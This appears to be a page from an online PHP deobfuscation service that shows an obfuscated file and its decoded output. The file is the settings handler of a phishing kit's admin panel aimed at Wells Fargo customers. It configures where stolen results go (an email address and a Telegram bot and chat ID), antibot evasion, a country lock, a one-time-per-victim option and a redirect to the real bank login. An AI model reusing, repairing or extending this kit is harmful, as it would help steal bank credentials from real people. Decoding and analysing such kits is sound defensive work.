Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto x8QH4; rTxvk: if (empty($_POST["\x4c\x6f\x67\151\x6e\137\62\130"]) || strtolo..

Decoded Output download

<?php 
 goto x8QH4; rTxvk: if (empty($_POST["Login_2X"]) || strtolower($_POST["Login_2X"]) != "on") { $Login_2X = "off"; } else { $Login_2X = "on"; } goto uHPoW; LLYjd: if (strpos($_POST["ProtectUrl"], "=") !== false) { $ProtectUrl = $_POST["ProtectUrl"]; } else { $ProtectUrl = "off"; } goto KCCBZ; e_ZTl: if ($_POST["CountryLock"] == '') { $country = "off"; } else { $country = $_POST["CountryLock"]; } goto itWMi; uHPoW: if (empty($_POST["block_desktop"]) || strtolower($_POST["block_desktop"]) != "on") { $block_desktop = "off"; } else { $block_desktop = "on"; } goto LLYjd; KHt_A: if (!isset($_SESSION["login"]) || !$_SESSION["login"]) { die(header("Location: ../login.php")); } goto e_ZTl; KCCBZ: $settings = fopen("../../fixer.ini", "w+"); goto wMjVy; TXB2v: $_SESSION["success"] = "Successfully updated page settings."; goto ZIShu; x8QH4: session_start(); goto zD0ya; wMjVy: fwrite($settings, "; Admin Panel Login
    ; Options: credentials\xa    \xa    Username = "" . $_POST["Username"] . ""
    Password = "" . $_POST["Password"] . ""\xa    \xa    ; Your email for results
    ; Options: email address\xa    
    Email = "" . $_POST["Email"] . ""\xa\xa    ; LOGIN 2X\xa    ; Options: ON/OFF\xa    
    Login_2X = "" . $_POST["Login_2X"] . ""\xa    \xa    ; Proctect URl\xa    ; Options: off or (querry=querry)
    
    ProtectUrl = "" . $ProtectUrl . ""
    \xa    ; Turn off antibot so you can test\xa    ; Options: on or off\xa    
    testing_mode = "" . $allow_ip . ""
    \xa    ; Antibot Level
    ; Options: low, mednium and high
    
    Antibot = "" . $_POST["Antibot"] . ""
    \xa    
    ; telegram api\xa    
    telegram_api = "" . $_POST["telegram_api"] . ""
    \xa    ; Your telegram char id\xa    \xa    telegram_id = "" . $_POST["telegram_id"] . ""\xa    
    ; Allow access to a specific country\xa    ; Options: country code or off
    \xa    CountryLock = "" . $country . ""\xa    \xa    ; victim can't access page after fill all
    ; Options: on or off\xa\xa    onetime = "" . $onetime . ""
    
\xa    ; allow desktop computers to access page\xa    ; Options: on or off

    block_desktop = "" . $block_desktop . ""\xa\xa    ; Don't change\xa    ; Don't touch\xa\xa    last_page = "https://connect.secure.wellsfargo.com/auth/login/present?origin=cob"
    \xa    
    ; Don't change\xa    ; Don't touch
\xa    page_name = "w3ll$_f4rg0"\xa\xa\xa    ; Don't change
    ; Don't touch\xa
    direct = "https://cnn.com"\xa
    ; Don't change\xa    ; Don't touch\xa    
    cookie_name ="dbc0pp3r_w3ll_f4rg0_page"\xa    "); goto TXB2v; zD0ya: require_once "../levels.php"; goto KHt_A; itWMi: if ($_POST["allow_ip"] == '' || $_POST["allow_ip"] != "on") { $allow_ip = "off"; } else { $allow_ip = "on"; } goto qYFuh; qYFuh: if (empty($_POST["onetime"]) || strtolower($_POST["onetime"]) != "on") { $onetime = "off"; } else { $onetime = "on"; } goto rTxvk; ZIShu: header("Location: ../settings.php"); ?>

Did this file decode correctly?

Original Code

<?php
 goto x8QH4; rTxvk: if (empty($_POST["\x4c\x6f\x67\151\x6e\137\62\130"]) || strtolower($_POST["\x4c\157\x67\x69\x6e\137\62\x58"]) != "\x6f\x6e") { $Login_2X = "\157\x66\x66"; } else { $Login_2X = "\x6f\x6e"; } goto uHPoW; LLYjd: if (strpos($_POST["\120\162\157\x74\145\143\164\125\162\154"], "\x3d") !== false) { $ProtectUrl = $_POST["\120\x72\157\164\145\x63\x74\125\x72\x6c"]; } else { $ProtectUrl = "\157\146\146"; } goto KCCBZ; e_ZTl: if ($_POST["\103\157\x75\x6e\164\x72\x79\x4c\157\143\x6b"] == '') { $country = "\x6f\146\x66"; } else { $country = $_POST["\x43\157\x75\x6e\x74\x72\x79\x4c\x6f\143\x6b"]; } goto itWMi; uHPoW: if (empty($_POST["\142\x6c\157\143\x6b\137\x64\145\163\153\164\x6f\x70"]) || strtolower($_POST["\x62\x6c\157\143\x6b\x5f\144\x65\x73\153\x74\157\160"]) != "\x6f\156") { $block_desktop = "\157\146\x66"; } else { $block_desktop = "\x6f\156"; } goto LLYjd; KHt_A: if (!isset($_SESSION["\154\157\147\151\x6e"]) || !$_SESSION["\154\157\x67\x69\156"]) { die(header("\x4c\x6f\143\141\164\151\157\x6e\72\40\56\56\x2f\x6c\x6f\147\151\156\x2e\160\x68\160")); } goto e_ZTl; KCCBZ: $settings = fopen("\56\x2e\57\56\x2e\57\x66\x69\170\145\x72\x2e\151\x6e\151", "\167\53"); goto wMjVy; TXB2v: $_SESSION["\163\165\143\143\145\x73\x73"] = "\x53\x75\x63\143\145\x73\x73\x66\165\x6c\x6c\x79\40\x75\160\144\141\x74\145\x64\40\160\141\147\x65\x20\163\x65\164\164\151\156\147\163\x2e"; goto ZIShu; x8QH4: session_start(); goto zD0ya; wMjVy: fwrite($settings, "\73\x20\x41\x64\x6d\x69\156\x20\120\x61\x6e\x65\x6c\x20\114\157\147\x69\156\12\x20\x20\40\x20\73\x20\117\160\164\151\157\x6e\x73\x3a\40\143\x72\x65\x64\x65\x6e\164\151\141\154\163\xa\x20\x20\x20\x20\xa\x20\40\40\x20\x55\163\145\x72\156\x61\155\145\x20\75\40\42" . $_POST["\125\163\x65\162\156\141\155\x65"] . "\42\12\40\40\40\40\x50\141\163\x73\167\x6f\x72\x64\x20\75\40\x22" . $_POST["\120\141\x73\163\x77\x6f\162\x64"] . "\42\xa\x20\40\x20\40\xa\x20\40\x20\40\x3b\x20\x59\157\x75\x72\40\x65\155\141\x69\x6c\x20\146\157\x72\40\x72\x65\163\x75\154\x74\163\12\40\40\x20\x20\73\x20\x4f\x70\164\x69\x6f\156\x73\x3a\40\x65\155\141\x69\154\x20\x61\144\x64\162\145\x73\163\xa\40\x20\x20\x20\12\40\40\40\40\x45\x6d\141\x69\154\40\x3d\40\42" . $_POST["\x45\155\141\x69\x6c"] . "\x22\xa\xa\40\x20\40\x20\73\x20\x4c\117\107\x49\116\x20\62\130\xa\40\40\x20\x20\73\40\x4f\x70\x74\151\157\x6e\x73\x3a\40\117\116\57\x4f\x46\106\xa\40\x20\40\40\12\x20\x20\x20\40\114\x6f\147\151\x6e\x5f\62\x58\x20\75\x20\42" . $_POST["\114\157\x67\151\156\x5f\x32\130"] . "\42\xa\40\40\x20\x20\xa\x20\40\x20\x20\x3b\x20\x50\x72\x6f\143\x74\145\x63\x74\x20\125\122\x6c\xa\x20\40\40\40\73\40\117\x70\x74\x69\157\x6e\x73\72\x20\x6f\146\146\40\x6f\x72\x20\50\x71\x75\x65\x72\162\171\x3d\x71\165\145\x72\162\171\x29\12\x20\40\40\40\12\40\40\40\x20\x50\162\x6f\x74\145\x63\x74\125\x72\x6c\40\75\x20\x22" . $ProtectUrl . "\42\12\40\40\x20\40\xa\x20\x20\x20\40\x3b\x20\124\165\162\156\x20\157\146\x66\40\x61\156\164\x69\x62\x6f\x74\x20\x73\157\40\171\157\165\40\143\x61\156\x20\164\145\163\164\xa\x20\x20\x20\40\x3b\x20\x4f\160\164\151\157\x6e\x73\72\40\157\156\40\x6f\162\x20\x6f\146\146\xa\40\x20\40\40\12\40\40\x20\40\164\x65\x73\x74\x69\156\x67\137\x6d\157\x64\145\x20\x3d\40\42" . $allow_ip . "\42\12\40\x20\x20\x20\xa\x20\40\x20\40\73\40\x41\156\164\x69\x62\157\164\x20\114\x65\166\x65\154\12\40\40\x20\40\x3b\x20\x4f\x70\x74\151\x6f\x6e\163\72\x20\x6c\x6f\167\54\x20\155\145\144\x6e\151\165\x6d\40\141\156\144\x20\150\x69\147\x68\12\40\40\x20\40\12\40\40\x20\40\101\x6e\164\x69\x62\x6f\x74\x20\x3d\40\42" . $_POST["\x41\x6e\x74\151\142\x6f\164"] . "\42\12\x20\x20\x20\40\xa\40\x20\x20\40\12\40\x20\40\40\73\x20\x74\145\154\145\147\x72\x61\x6d\x20\x61\160\x69\xa\40\40\40\x20\12\x20\40\40\x20\x74\x65\x6c\x65\147\x72\141\155\137\x61\160\151\x20\x3d\x20\x22" . $_POST["\164\x65\154\145\x67\162\x61\x6d\x5f\x61\160\x69"] . "\x22\12\40\40\x20\40\xa\x20\x20\x20\40\x3b\40\x59\157\165\162\40\164\145\x6c\x65\147\162\x61\155\x20\143\x68\141\x72\x20\x69\x64\xa\40\x20\40\40\xa\40\x20\x20\40\x74\145\154\145\x67\162\141\x6d\x5f\x69\x64\x20\x3d\40\x22" . $_POST["\164\145\154\145\147\x72\141\x6d\x5f\x69\144"] . "\x22\xa\40\x20\x20\40\12\40\40\40\x20\x3b\40\x41\x6c\154\x6f\x77\x20\141\143\143\145\x73\163\40\x74\x6f\x20\141\40\x73\x70\145\x63\151\x66\x69\143\40\x63\x6f\165\156\164\162\x79\xa\40\x20\40\40\x3b\40\117\x70\x74\x69\157\156\x73\x3a\40\x63\157\165\x6e\164\162\x79\40\143\157\144\x65\40\x6f\x72\x20\157\146\x66\12\x20\40\x20\40\xa\x20\40\x20\x20\103\157\x75\x6e\x74\x72\x79\114\x6f\143\x6b\40\x3d\x20\x22" . $country . "\x22\xa\40\x20\40\x20\xa\x20\40\40\40\x3b\40\166\151\143\x74\x69\x6d\40\143\x61\x6e\47\164\40\141\143\x63\145\163\163\x20\160\x61\x67\145\40\x61\146\164\145\162\x20\x66\x69\154\154\x20\x61\x6c\x6c\12\x20\x20\40\x20\73\40\117\160\x74\151\x6f\156\x73\x3a\40\x6f\x6e\x20\x6f\x72\40\157\x66\146\xa\xa\40\x20\x20\40\x6f\156\x65\x74\x69\155\145\x20\x3d\40\x22" . $onetime . "\x22\12\40\x20\x20\x20\12\xa\x20\x20\40\40\x3b\40\141\x6c\x6c\157\x77\x20\144\145\163\x6b\164\x6f\160\x20\143\x6f\155\160\x75\164\145\x72\163\40\164\x6f\40\141\x63\x63\145\163\x73\x20\160\x61\147\x65\xa\x20\40\x20\40\73\40\117\x70\164\x69\157\x6e\163\x3a\40\x6f\156\x20\157\x72\40\x6f\146\x66\12\12\x20\x20\40\40\142\154\x6f\143\153\137\144\x65\x73\x6b\164\x6f\x70\x20\75\x20\42" . $block_desktop . "\42\xa\xa\x20\x20\x20\40\x3b\x20\104\157\x6e\x27\164\40\143\150\x61\156\147\x65\xa\40\x20\x20\x20\73\x20\104\x6f\156\47\164\40\164\x6f\x75\143\x68\xa\xa\x20\x20\x20\x20\x6c\x61\x73\x74\137\x70\x61\x67\x65\40\x3d\x20\x22\150\x74\x74\160\x73\72\57\57\143\157\156\156\145\x63\164\56\163\145\143\x75\x72\145\56\x77\145\154\154\x73\x66\141\x72\147\x6f\x2e\x63\157\155\57\141\x75\164\x68\57\x6c\x6f\x67\151\x6e\x2f\x70\x72\x65\163\x65\x6e\x74\x3f\x6f\x72\151\x67\x69\156\x3d\143\157\142\x22\12\40\40\x20\40\xa\40\x20\40\x20\12\40\40\x20\x20\73\x20\104\157\x6e\47\164\x20\x63\x68\141\156\x67\x65\xa\40\x20\40\x20\73\40\x44\157\x6e\x27\x74\40\x74\157\x75\143\x68\12\xa\x20\x20\40\40\160\x61\147\x65\137\x6e\141\x6d\x65\x20\x3d\40\42\x77\63\154\154\44\137\146\64\162\147\60\x22\xa\xa\xa\40\x20\x20\x20\73\40\104\x6f\x6e\47\x74\40\x63\x68\141\x6e\x67\145\12\x20\40\x20\x20\73\x20\104\x6f\156\47\164\x20\x74\157\x75\143\x68\xa\12\x20\40\40\40\144\151\x72\x65\x63\x74\x20\x3d\40\x22\150\164\164\160\163\72\x2f\x2f\x63\x6e\156\x2e\143\x6f\155\42\xa\12\40\x20\40\x20\73\40\104\x6f\x6e\47\164\x20\143\x68\141\156\x67\145\xa\40\x20\x20\x20\x3b\40\104\157\x6e\47\x74\40\164\x6f\165\x63\x68\xa\x20\x20\40\x20\12\x20\40\x20\x20\143\x6f\157\153\x69\x65\137\x6e\141\x6d\x65\40\x3d\42\144\142\143\60\160\x70\x33\162\x5f\167\x33\154\x6c\137\x66\x34\162\x67\x30\137\160\x61\147\145\x22\xa\x20\40\40\40"); goto TXB2v; zD0ya: require_once "\56\56\57\154\145\166\145\x6c\x73\56\160\150\160"; goto KHt_A; itWMi: if ($_POST["\x61\x6c\154\157\167\x5f\x69\x70"] == '' || $_POST["\141\x6c\x6c\157\167\x5f\x69\x70"] != "\x6f\156") { $allow_ip = "\157\x66\146"; } else { $allow_ip = "\x6f\156"; } goto qYFuh; qYFuh: if (empty($_POST["\157\156\x65\164\x69\155\145"]) || strtolower($_POST["\157\156\145\x74\x69\155\x65"]) != "\157\x6e") { $onetime = "\157\146\146"; } else { $onetime = "\157\156"; } goto rTxvk; ZIShu: header("\114\x6f\x63\141\x74\151\157\x6e\x3a\x20\x2e\x2e\x2f\x73\145\164\164\151\x6e\147\163\x2e\x70\150\160");

Function Calls

None

Variables

None

Stats

MD5 1bdb075782be4aa61f3592812175c31d
Eval Count 0
Decode Time 60 ms